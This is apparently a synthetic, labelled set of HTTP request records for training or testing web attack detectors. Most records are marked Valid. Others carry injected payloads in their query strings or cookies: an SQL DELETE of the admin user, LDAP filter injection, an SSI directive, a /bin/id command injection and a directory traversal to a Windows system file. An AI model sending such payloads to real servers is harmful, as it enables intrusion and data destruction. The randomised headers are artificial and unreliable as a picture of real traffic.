User-Agent: uJj3SwuF http://www.8ejrom.com
UA-CPU: PowerPC
UA-Disp: 0717,4017,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 948x5637
Via: HTTP/2.0 www.6eaa.jpeg
Transfer-Encoding: gzip
Upgrade: Ted/7.1, ssl/4.1, lrAen/2.6, aqad/2.5, 0eb/3.9
Warning: 798 www.leeOy.tiff "xtasHAn" 
X-Forwarded-For: 199.237.53.206
X-Serial-Number: 881023416032
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11075
Start - Id: 7575
class: Valid
POST /6ueai5dsq4dr/5insjbshtestehooTd7n/tixQOxCPazt-KE/nEKimNb0ieE5/7sG5vKj/tU6tyLGdiHR2eGjI-/gG2YEcIJjqX6I1/QgM3a.mspx? HTTP/1.0
Content-Length: 246
Content-Language: o51hr9t
Content-Encoding: gzip
Content-Location: http://dGHtom.be/odniavl/eeopo.swf
Content-MD5: cmJldVVRdHJ1YmhFZWxvdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Oct 08 17:42:54 UTC
Last-Modified: Wed, 14 Apr 04 17:37:19 CET
Host: 240.194.105.84:873
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-icelandic, utf-8;q=0.4, iso-8859-3;q=0.0, windows-1251, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=94
Client-ip: 200.251.59.55
Cookie: bsrA=bTsear
Cookie2: $Version="82"
Date: Fri, 01 Aug 08 12:55:19 UTC
ETag: "lNwGXgAu@mRnVRxV"
Expect: 100-continue
From: pu3inrn@eUo4a.uk
If-Modified-Since: Fri, 08 Aug 08 14:00:46 GMT
If-Unmodified-Since: Mon, 13 Nov 06 07:25:45 CET
If-Match: "2ar8LBXeE@IuRH@"
If-None-Match: *
If-Range: Mon, 06 Nov 06 17:30:11 GMT
Max-Forwards: 2
MIME-Version: 1.7
Pragma: t8fheIb=o3
Proxy-Authorization: Basic ZGl0NWRuZTpkaXNhZnRzaQ==
Authorization: anfR isoatar=wsuzm
Range: 69-,47138-,-5
Referer: /rel0/seitetc.bin
TE: deflate;q=0.9
Trailer: Accept-Language
User-Agent: obralkd/8.1
UA-CPU: Sparc
UA-Disp: 743,207,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5452x8667
Via: 0uenur/1.3 www.VulNetzh.jpeg, 6.0 184.123.102.229:75507, 1.5 35.116.61.177
Transfer-Encoding: gzip
Upgrade: Trcl/0.4, Iktrb/8.6, ydcebx/8.7, rfe/6.1
Warning: 670 www.ienda.png "9anpoipyn2sa" 
X-Forwarded-For: 133.114.114.3
X-Serial-Number: 6700173
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lsaprOovqb=aoxearkidmlt8wbr&6aea=sI-&ktnd=amwnYDw&lujS=4&Wzs9j1towan=eXpHEGSeC&rexini6oeod3bsO=eJJDdH&itPf1l=tihtgfnns8itgr&vsionT87a=9&4oeeieme1hd=teu&3Ntyens8w5taot=wgettbx&84Ihmngeen=netcatpdh9aIsri'ea2rve&l2egrooo=58745423&2mo8typ7nlmonh=26

End - Id: 7575
Start - Id: 39299
class: SSI
GET /eeelhrozviuan0cBiFs/anohTvjoedtRtna1.bin?neefE5eg=weh+7bd%3Fe&lIahshboB=%5Canxtermfromdbalewinntp+%24l&mbinSm75NnCobjectcM=si&ai=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: 170.73.94.204
Connection: dEnhshx
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-age=9507
Client-ip: 178.60.27.113
Cookie: e5htnbH1erD5=3390562100;io=9;chniwebXrn8=7;gndAfine=74
Cookie2: $Version="27"
Date: Tue, 13 Apr 10 05:30:32 GMT
ETag: W/"jsr.W0L@rVg50t8d"
Expect: iGetlsru
From: unmiie@Hyivtsn.com
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Sun, 29 Mar 09 17:57:44 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Dec 04 20:00:28 CET
Max-Forwards: 8
MIME-Version: 6.8
Pragma: acendteT='aazbwoa4'
Proxy-Authorization: Basic N3NzZ21vbG86bnUzaQ==
Authorization: NTLM NWN0R2Qwb3RyaGZ3ZGVvVGNkZmpucXlhaXRhQU1uZWZs
Range: -9614
Referer: http://ic5odta.it/HVRsLo.asp
TE: trailers,deflate;q=0.6
Trailer: Expect
User-Agent: Mozilla/2.1 (Windows; U; WinNT 3.2; ai-7I; rv:2.4.5) Gecko/89323307
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 573x190
Via: 6.1 209.225.112.43, 6.8 www.ytmo.tiff
Transfer-Encoding: ks2h1; sdgoons=srt4ty
Upgrade: asiM/9.3
Warning: 156 www.oflmf0.htm "ohhwOseoMrpccZBlSp" 
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 80952053828136219
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39299
Start - Id: 11000
class: Valid
GET /eUJ0MfAA9CnniynMmri.asmx? HTTP/1.1
Host: www.tnyoErf7ds.org
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257, iso-8859-15;q=0.2
Accept-Encoding: identity;q=0.0
Accept-Language: *
Cache-Control: max-stale=36181
Client-ip: 58.154.119.219
Cookie: 8eefgaetRurfa=93729618;nheiam0Owiti0ht=wcoqEd38att;strAnmSC=8eJe4tmpeMssta;gOC2OIY=s71U-QbS;orl6ghoWEa=thlsl
Cookie2: $Version="9"
Date: Wed, 29 Mar 06 19:00:05 CET
ETag: W/"l8..wJbV_NcnsULR@Ak0"
Expect: cb8a=sgSCry;ouektrr=niUsnMr
From: Oimrip@itut.fr
If-Modified-Since: Wed, 18 Mar 09 05:58:08 CET
If-Unmodified-Since: Mon, 25 Jun 07 23:42:06 CET
If-Match: "T5r81ySG9iQRNPZ-J_O"
If-None-Match: *
If-Range: Mon, 27 Nov 06 20:08:13 CET
Max-Forwards: 41
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest qop=kimet5
Authorization: Digest uri=/tn2ama/6itio/iaeoe7u.fgf
Range: 68-612
Referer: /suUeae/j1w2ti/s9Onjy/tfms3.mspx
TE: chunked;q=0.7,trailers,deflate
Trailer: Date
User-Agent: Mozilla/8.3 (compatible; Konqueror/7.8; Open BSD i386; vQuo; H0ei3me; ye27lnewrb)
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 124x705
Via: HTTP/1.5 144.181.28.203:69898
Transfer-Encoding: compress
Upgrade: Enfrte/3.8, el1/4.8, i8r/0.7, 7AJjip/7.1
Warning: 493 www.mbiaia.jpg "tsateneO" "Sun, 03 May 09 04:54:06 CET"
X-Forwarded-For: 240.197.61.11
X-Serial-Number: 109708230731
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11000
Start - Id: 42470
class: SqlInjection
GET /xcitnwsaoeicswamaoi/gR0.htm?o8rrhaiOa=nnlahhiat&ner=3069&tAE82onwhudltoe=91&saoymetehepb4p=8488&6ehdeni=eFsoB&y61ns0paZtnAlo=evXg&Sn0uO3rine=iSaao6nPl%27++%29%3B+++++DEL%2F**%2FETE+++FROM++users++WHERE+++upper%28username%29+++++%3D++++upper%28+++%27admin&0goesGdwdaSlhE=7hmx%24 HTTP/1.0
Host: 195.173.198.155:042
Connection: keep-alive
Accept: audio/basic
Accept-Charset: utf-7;q=0.5, windows-1257, x-mac-chinesetrad;q=0.3, utf-8
Accept-Encoding: gzip;q=0.9, gzip;q=0.1, gzip;q=0.1, deflate;q=0.4
Accept-Language: svs1-asioueo;q=0.0, Eercd-xst
Cache-Control: max-age=561
Client-ip: 137.106.140.246
Cookie: ehcfue=csrn
Cookie2: $Version="3"
Date: Sat, 20 Dec 08 11:36:49 CET
ETag: W/"@dg_HmJm7tTPjS6Y_y"
Expect: ot5a
From: eabBn@aahunaiie.fr
If-Modified-Since: Thu, 19 Feb 09 15:16:13 GMT
If-Unmodified-Since: Sun, 13 Mar 05 03:49:30 CET
If-Match: "3jZ1Ow8wUTNQRCQS2l2"
If-None-Match: "WlbZVL9h4I.ROcm-u"
If-Range: Sun, 13 Sep 09 17:59:33 CET
Max-Forwards: 88
MIME-Version: 1.4
Pragma: tiEo=tklt
Proxy-Authorization: Digest nonce
Authorization: eptd iSea=snwne
Range: 909400-,77915-,-01017
Referer: http://www.reieoAn.biz/pIbxi/0eec7ds/RIrstR.php3
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Et3alsNEh3 (ewqixlk; iL0pvv; hZXbviL)
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: HTTP/8.9 www.bNermra.jpeg
Transfer-Encoding: identity
Upgrade: mc9c/0.1, Rek40w/1.3, rcow/4.1
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42470
Start - Id: 37052
class: LdapInjection
GET /rvF0ELOfPMXK./f-B2LNL5YSWid/rm4cr/uD/adS7/IXfV/khWJCr.png?ihtenatwnkeav=26468806&no=8095%29%28%26%28objectClass%3Dehed%29%28%7C%28sn+%3DnoNW%29%28cn%3Dgr+J*%29%29&ose=f%24tk8%40acceptnopene%3Cd%3Csp0tnwh&84aiodao00nrhy=es8rblRm0to&y9DBs=7&nlnsmt9y=w%40swGyq4&ryhelaohrnGer=7thkebnie%24w63&usiE8e=864742019&ydOR56flike0=8398&u5ih=+7e-e&s0i=%3Ftmailqvbscript-lss0aaqevalr&QoC42d%uC-log=77&cn=ns&w8nLaccept6connect1tmpSCK=rnfsensser%3Bea&baudho1U02done=ithsaefset HTTP/1.1
Host: www.ethe.uk
Connection: close
Accept: */*
Accept-Charset: utf-7, x-mac-arabic
Accept-Encoding: *
Accept-Language: hMoe-tr, q-tna, 5qHet6v-yr90dsse, y9eir-n7mloon6;q=0.0, tOt4o7rr-hi;q=0.6
Cache-Control: no-cache
Client-ip: 197.60.249.140
Cookie: D6e=e;4qZIneSzi=113222
Cookie2: $Version="68"
Date: Fri, 01 Aug 08 19:53:57 GMT
ETag: W/"IEKMqsmRqtDiKn8U3"
Expect: 100-continue
From: ibiyuSf@istTee.cz
If-Modified-Since: Fri, 07 Aug 09 20:36:45 GMT
If-Unmodified-Since: Sat, 31 Oct 09 24:02:31 UTC
If-Match: "tam9Wvcj.NPBOl5OhObA"
If-None-Match: *
If-Range: Fri, 16 Mar 07 15:56:45 UTC
Max-Forwards: 74
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 5i2re 1lveu=8spaotso
Range: 03242-,-0
Referer: http://lleyyci.cz/k42firas.conf
TE: deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.4 (Machintosh; U; Mac OS X 8.2; ti-i8; rv:0.6.7) Gecko/34790781
UA-CPU: 68000
UA-Disp: 907,610,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 716x540
Via: 1.2 www.mlneEeN.js:708, HTTP/1.3 110.40.241.142
Transfer-Encoding: compress
Upgrade: nopuat/4.5
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37052
Start - Id: 14356
class: Valid
GET /ezMspaA_NTAJ3/q8Lltelnet/eB49a/P9MudBlsF5f-/1WP1lyR8WrcGh_Uck/osrtsoBnwIdTrhnym/odtiEiv/6wiTB0VNm/ttsetpkdeoepseo.mdb?7iefieesj=nwm&eynsn=srqiessgsht&ueeaqeed=%3C&ontjoi=11&optWBBK1AyYZb=rOs7beertaEr6otte HTTP/1.0
Host: 187.249.88.237:80
Connection: 3easegt
Accept: video/*, image/*
Accept-Charset: iso-8859-8-i;q=0.0
Accept-Encoding: identity;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 140.179.154.56
Cookie: Jtmpyhst19R13like=m;eoqiEnt=tgtdivecti le
Cookie2: $Version="48"
Date: Sat, 17 May 08 02:01:54 CET
ETag: "Nhmi4@YM.W3b4Lrs@D0"
Expect: galsle=tncatans
From: dn4yib@8dee.fr
If-Modified-Since: Wed, 05 Jul 06 04:49:28 GMT
If-Unmodified-Since: Thu, 29 Dec 05 11:12:14 GMT
If-Match: *
If-None-Match: *
If-Range: "yI-I8gVwcEkwJxbI"
Max-Forwards: 3
MIME-Version: 0.2
Pragma: tir=ie
Proxy-Authorization: are8Hq iWu7=vneaiwu
Authorization: Digest response="516BEE4c6fF9A0a1499Ca82A523eBfea"
Range: -8,95-
Referer: /0Sa5ne3h/ihwdvo/eere/ofeTioT/irhto.mpg
TE: trailers,gzip;q=0.1,chunked
Trailer: Cache-Control
User-Agent: ow2at (osCxBj; ePGyHjoB; aFCAnLl.D; t6ZrfYP8Zf)
UA-CPU: StrongARM
UA-Disp: 566,1872,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8463x313
Via: 7.3 www.tMiya7y.gif
Transfer-Encoding: deflate
Upgrade: ere/0.1, 6eI/9.1
Warning: 602 www.usoFyOoy.jpg:8520 "Eoitcrxehi3nma6uas" "Wed, 04 Jul 07 21:38:06 GMT"
X-Forwarded-For: 54.65.208.97
X-Serial-Number: 97794258051819515
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14356
Start - Id: 8769
class: Valid
GET /Cvou6rae0nr/UXQsdgc/fv/iR/nLtSwObI8LjRLm.jsp?ditqrsphv0=48&3afDlahEl=mbZ9i&nceeosetw=rVf1&0ddGXYaEscriptxr1php=967491293&suen=+&Eyyhvduaza9=g%3Daualg&.csetc=78063110&ieTstisrfgit=3Sf%40R&S7tk08=updatee8&meeso=2375031&btu=53817&2his=29449 HTTP/1.0
Host: 223.135.80.122
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-10646-ucs-2;q=0.5, iso-10646-ucs-2, windows-1257;q=0.5, x-mac-turkish
Accept-Encoding: 
Accept-Language: cw7tL-dxrt, bt-eu, rostTd-neNysr;q=0.6, nef-inrmm, hco-trsgc;q=0.1
Cache-Control: max-stale
Client-ip: 210.108.58.90
Cookie: sxbcl=oN_e
Cookie2: $Version="149"
Date: Fri, 09 May 08 13:58:05 GMT
ETag: W/"mN-q7y62RCi4Ex1"
Expect: 100-continue
From: xrVtdi5@b55e.cz
If-Modified-Since: Mon, 06 Sep 04 13:47:31 UTC
If-Unmodified-Since: Sat, 15 Jul 06 06:30:56 UTC
If-Match: "7dpROuDyQRi93mSNXCvR"
If-None-Match: "VdFlgzhNv32p5y-m"
If-Range: "N_4jnFXLIxVhJkxdlv3"
Max-Forwards: 5
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic OWVxbjplZUJBaA==
Authorization: Digest uri=/tw6uw/sair/zlUepon2.wmn
Range: -914608,-7
Referer: /eliono/sztje.php3
TE: trailers,gzip;q=0.3,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.7 (X11; U; Unix 8.0; ts-8t; rv:0.4.9) Gecko/19873995
UA-CPU: Sparc
UA-Disp: 608,0739,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3952x6692
Via: 4.9 51.90.131.233, 5.0 94.190.125.173:5697
Transfer-Encoding: deflate
Upgrade: imnd/5.9
Warning: 642 69.235.0.195:2770 "RaqtwI1" "Tue, 27 Jul 04 11:32:37 GMT"
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8769
Start - Id: 43172
class: OsCommanding
GET /tho/ty9dqaSnmtmihooerr9/ggfJBpwT1lN1/tCT/vfkXWconnect3/wKaXq58RYxGI/.C1%uI170L/IB/Ld_IP.msf?awuwwxionr=eNATDzL46Q&xzmpnipStnx7=%5C%3B+++%5C%2Fbin%5C%2Fid++++%3B&keean4qdee3sqhH=adhhsbtthtpassdwgete8Avbscript&lessoagcop=5 HTTP/1.1
Host: 82.21.145.90
Connection: n4ronus
Accept: */*
Accept-Charset: x-mac-icelandic
Accept-Encoding: *
Accept-Language: tbxRow-vTnetiri, he-gbcre, et-aa5vb;q=0.6, tiior-ron9t;q=0.1
Cache-Control: max-stale
Client-ip: 174.7.46.175
Cookie: LuCwgetPjobject=13630872;Oqetoo=123;fmspsvearriNn=ublslibAxmlnunceexec;Txpca3yv5=lR8BbIS;SZOS.SXPIZ=baeiao;otAooHatle=taho
Cookie2: $Version="045"
Date: Sun, 30 Jul 06 24:06:02 GMT
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: spog@iutmqee.net
If-Modified-Since: Fri, 05 Mar 10 06:21:51 GMT
If-Unmodified-Since: Fri, 17 Jun 05 19:30:21 CET
If-Match: "EGW_uXyBFzbUOj1Awf3"
If-None-Match: "9G-r3zudstkL2b4S"
If-Range: Tue, 13 Jul 04 13:50:29 UTC
Max-Forwards: 921
MIME-Version: 6.0
Pragma: sSIuriea=sdNhel
Proxy-Authorization: coloIh rs8x9a=2Iwcett
Authorization: znYa noqoerfi=esinoiNr
Range: 332370-1588,656-95
Referer: http://www.ddksooo.uk/lintenos.cfm
TE: gzip
Trailer: Transfer-Encoding
User-Agent: sshcent/0.9
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: 7.1 www.ssttlemo.jpeg
Transfer-Encoding: qrcQeh
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43172
Start - Id: 13014
class: Valid
GET /oqesu/nsdthi/lWNZUkBA-nE.html?8me8tere=tao&Trraoehe=2819880&7o3rxsuEo7a=se&eh7aeif=5922&etaioeioIcsCesq=jitigi4oiridces&oatst3zctfrveer=665&nssho=elogetelnettmppvsqRedE&p5varA2tA=heim+ HTTP/1.0
Host: www.9hiengt.com
Connection: eclel8ex
Accept: */*;q=0.5
Accept-Charset: iso-8859-8-i, iso-8859-4, windows-1255;q=0.0, euc-tw;q=0.8, x-mac-korean;q=0.2
Accept-Encoding: identity, deflate;q=0.7, deflate, compress;q=0.1, compress;q=0.1
Accept-Language: *
Cache-Control: max-age=12676
Client-ip: 82.22.221.79
Cookie: Tabpdst8gRoet=97192737;vafaE=zodenhaoOdrmt;agnic3rews=0042;-Ehhz_R=50
Cookie2: $Version="104"
Date: Mon, 19 Apr 10 08:35:08 UTC
ETag: "ansp2fbURx9hGqH@o8U"
Expect: Xeaushv
From: hhrsnmqd@cyrn.com
If-Modified-Since: Thu, 12 Jan 06 24:09:07 UTC
If-Unmodified-Since: Sat, 13 Sep 08 16:56:51 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Nov 07 10:06:10 GMT
Max-Forwards: 87
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic YW53aWVhOmRzM21hZWh2
Authorization: NTLM b2FmdTdkZVV5NXRjZUl4c2RudXIyYnRyZWtleWlhb2Rlb3JndXc=
Range: 777-8861,-671902,43-427
Referer: http://a37n.gov/etedaaum/xssi/ev8eato/TJ1teHco/Umii.exe
TE: trailers,trailers,chunked
Trailer: Range
User-Agent: uaohoRAHiw/3.1.3.5.3
UA-CPU: StrongARM
UA-Disp: 222,458,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 011x9947
Via: HTTP/0.4 11.128.39.245
Transfer-Encoding: compress
Upgrade: eerIry/1.5, votgew/9.6, uRsae/3.7, isoe/2.4, ebitdw/7.1
Warning: 278 www.2Nmfe.png "0irSv" 
X-Forwarded-For: 229.9.95.131
X-Serial-Number: 48761623
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13014
Start - Id: 12206
class: Valid
GET /e2G930/4RnSO/sa2eenfroatjeuseOms/onioyeoedol7v31h/mmelcr4e79u7nhh/lunionfoptZCcatje5fgm/m1ehdndfbobza3/zR.css?er3dbbgwo=ca%3Ai&aedhiciaIhuiyy=aooeldmW&Svxdm55e=ieiio+ecii0&rhnp=bntt&2citIa8y=0726302&aoytlL9ts=U&nf6yemyEie3dleR=03577514&CmX0VW4EO=93986&nlcyoidert7gqiR=es&sein2lot=inadanyMpt8tslqq&csxk=eS6u0etioLep3btbe+%2B&gn0mitxritE=aaE%3B%27dformITd2shutdownkt HTTP/1.0
Host: www.qhjud.cz:80
Connection: hddHrdd
Accept: application/postscript;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: 6-gn48Jee;q=0.5
Cache-Control: Sxo=a
Client-ip: 157.216.243.76
Cookie: XnPG=oodfa2s;lemss9zoervidi=g0CrheI5cfay;ehee=21183772;r1gqtpdtn=fm.iRI8s.;mOPNsiiFkgroup byJt=ed5fzJbjo5lZ
Cookie2: $Version="5"
Date: Sat, 01 Mar 08 07:16:08 CET
ETag: W/"B5G66.dZxj1jVUQeN_KK"
Expect: 100-continue
From: 0asmsn6h@SRnxete.org
If-Modified-Since: Sun, 25 Jan 04 16:57:05 UTC
If-Unmodified-Since: Tue, 24 Jun 08 05:39:08 UTC
If-Match: *
If-None-Match: *
If-Range: "4ZLUAh@4BrHnz4Lnxk"
Max-Forwards: 82
MIME-Version: 0.1
Pragma: r='rrgo'
Proxy-Authorization: whuq neane=nte9e
Authorization: esgl wntes=g9hn
Range: -341,81708-966475
Referer: /2de3s/homanto/ybe8e.bin
TE: deflate;q=0.8,deflate;q=0.2,trailers
Trailer: Expect
User-Agent: Lhbnnilt8e (rvAaG5cR; b9Z.1TstX)
UA-CPU: x86
UA-Disp: 3158,9578,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 161x2699
Via: 3.8 212.16.255.138, 2.8 125.71.242.250, 3.5 www.e1ftieun.html
Transfer-Encoding: gzip
Upgrade: 8cClsn/2.6, omSiT3/7.4, f6it2/4.1
Warning: 093 www.niwbedo.shtml "3eaiaiRarlwbw8hiaee" "Tue, 10 Jan 06 12:35:20 UTC"
X-Forwarded-For: 75.67.125.249
X-Serial-Number: 1017195793221995647
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12206
Start - Id: 1637
class: Valid
GET /m03a3_Ni@SBot/imgBUlWytkZ8U/oEnz7cuift/lJ_i7y6.php3?tta=eih HTTP/1.1
Host: 2.63.188.0
Connection: close
Accept: */*
Accept-Charset: us-ascii;q=0.9, macintosh
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=927
Client-ip: 227.65.178.205
Cookie: nzsamise9uf=ekzpd0cBU8
Cookie2: $Version="69"
Date: Fri, 04 Jan 08 18:49:24 UTC
ETag: "tBVX.FyYsEPfvzdNa"
Expect: gattfg
From: S6tD@nser.com
If-Modified-Since: Mon, 19 Feb 07 09:54:18 CET
If-Unmodified-Since: Thu, 07 Jan 10 10:20:25 UTC
If-Match: "ypGMBu8J6NppEQi"
If-None-Match: "QU.WfZ5GhwuR9_w"
If-Range: Thu, 21 Jul 05 24:48:14 UTC
Max-Forwards: 894
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: es3tes ibDss=nnhorbz
Authorization: Basic bnVib2dlbDplZjRl
Range: 38957-
Referer: /sT5lue/tmon8q/4t9ml/ri81.php
TE: chunked;q=0.6
Trailer: From
User-Agent: IqhpxamsRe
UA-CPU: 68000
UA-Disp: 6093,2247,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7605x6639
Via: 7.5 88.224.65.37:689, eeno/3.3 www.a3jEi.gif, 7.3 9.76.58.229
Transfer-Encoding: identity
Upgrade: th0d/7.3
Warning: 252 www.8uyednec.gif "mHasti" "Sat, 21 Apr 07 05:42:55 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 9219304
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1637
Start - Id: 23692
class: Valid
GET /s4_5g/rtopmacieenrunZye/Sxp_FQE6ls/fiLrPUy/e9SGOzsHgLRKsfiGn-S/h3MkJg15WA.pl?tz5es5ptlys=twwnotosRrelt6&neoneY=elN&tkiscdscaDsne=930 HTTP/1.1
Host: 64.47.23.111
Connection: llnidoFn
Accept: audio/x-wav, video/quicktime
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: E='searb'
Client-ip: 107.198.190.163
Cookie: uast=dmsne;spbh9q7=yC_QAX;ussy=mtrh88exec
Cookie2: $Version="7"
Date: Tue, 15 Nov 05 11:07:36 CET
ETag: "W0QzEOxW-SbkggqBD"
Expect: 100-continue
From: lanon@fBeece5si.gov
If-Modified-Since: Sun, 12 Dec 04 06:27:21 UTC
If-Unmodified-Since: Mon, 05 Nov 07 07:22:06 CET
If-Match: "KtufZn6DnvTv5Yq"
If-None-Match: "NuBlchVKBtOEFSw"
If-Range: "sN05M2HGZsLXDFXESc41"
Max-Forwards: 6
MIME-Version: 4.4
Pragma: dSnsund=o
Proxy-Authorization: eaweh z0t6U6=ndaum
Authorization: Basic b24yN3RGOnhVZW8=
Range: 5716-
Referer: /scneic/rverir.jpg
TE: trailers,chunked,gzip;q=0.8
Trailer: Cache-Control
User-Agent: ko9ote/8.7.9.7
UA-CPU: MIPS
UA-Disp: 188,809,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3131x3591
Via: 6.8 123.180.144.134, FTP/1.7 204.72.200.21, 2.5 www.qtwts.jpg
Transfer-Encoding: deflate
Upgrade: 1ataa8/2.4, tfcco/9.9, ntpeI/3.5, Kng5/3.3, ii3/6.1
Warning: 856 71.214.87.68 "aesKobNh8beti" 
X-Forwarded-For: 221.201.74.91
X-Serial-Number: 13224
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 23692
Start - Id: 30628
class: Valid
GET /sO-Ul7/tafoizsoovnroimledc/wQ.6bu49RH0GqO/rdImDGcMqgW/26qBjrj/tlPH/gV_.php3? HTTP/1.0
Host: 200.219.1.139
Connection: keep-alive
Accept: application/rtf;q=0.7
Accept-Charset: x-mac-turkish, euc-kr;q=0.5, iso-8859-1;q=0.7, windows-1253
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=84582
Client-ip: 152.187.29.149
Cookie: trzlfe=lntazn5nroteoRrblz;teeahitp=5b2i;0n=doYHmr1XMa6l;cth=818427333
Cookie2: $Version="530"
Date: Sat, 25 Nov 06 04:34:58 GMT
ETag: W/"zq5kPQg.QD_a9pF5"
Expect: sheseepe
From: rAjai@bdsfim.st
If-Modified-Since: Wed, 24 Dec 08 07:53:06 CET
If-Unmodified-Since: Sat, 05 Aug 06 24:16:27 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 25 May 09 20:42:35 UTC
Max-Forwards: 3
MIME-Version: 1.8
Pragma: nEN='rlmeis'
Proxy-Authorization: NTLM aGRyUWlDc2VTb0lwdGxoN2kzZTJtSWw2c292cmgybWVhc2VCZGRBc2R0ZmJudQ==
Authorization: NTLM bmVlM29zb2ZoZWVuaElzc2FlbHRkZWVlYWh3Y290QXV0b3Q=
Range: 426-,-6
Referer: http://www.roae.biz/gdvh/gt7utd/yartiie.tar
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.1 (X11; U; SunOS sun4u 1.8; lx-fe; rv:8.5.7) Gecko/65641790
UA-CPU: StrongARM
UA-Disp: 436,0901,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 313x6733
Via: 4.9 www.ttAhd.html
Transfer-Encoding: identity
Upgrade: 0gtw/9.1, Wtkt/5.8, Hes6g/7.6, RE4ntd/6.1
Warning: 055 www.eenm1.shtml "niJnlgnspnleuaov" 
X-Forwarded-For: 115.201.164.251
X-Serial-Number: 330746
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30628
Start - Id: 45314
class: PathTransversal
GET /huNpJsjEyOj7YwN52/OoU6Ep9sqi7daaLe/eSAVlQQ2iKhiQFcRQu/aLaCC6Yelz7.lnKT/geiaX9ailis/Ioneeffooor.html? HTTP/1.0
Host: www.rceneNZ.cz
Connection: le0eme2
Accept: text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 0nsd29bv-stsehtmJ, Itetu-X;q=0.8, afpo-cii;q=0.7
Cache-Control: max-stale=311
Cookie: hmfts7s=@4l9ni7i;rodte=a9oTogl;H2NDXcnetcatR=sd'n;tL6o=../../../../../../WINNT/autoexec.bat
Date: Fri, 30 Oct 09 18:55:52 CET
Expect: 100-continue
If-Modified-Since: Thu, 16 Jul 09 05:56:41 GMT
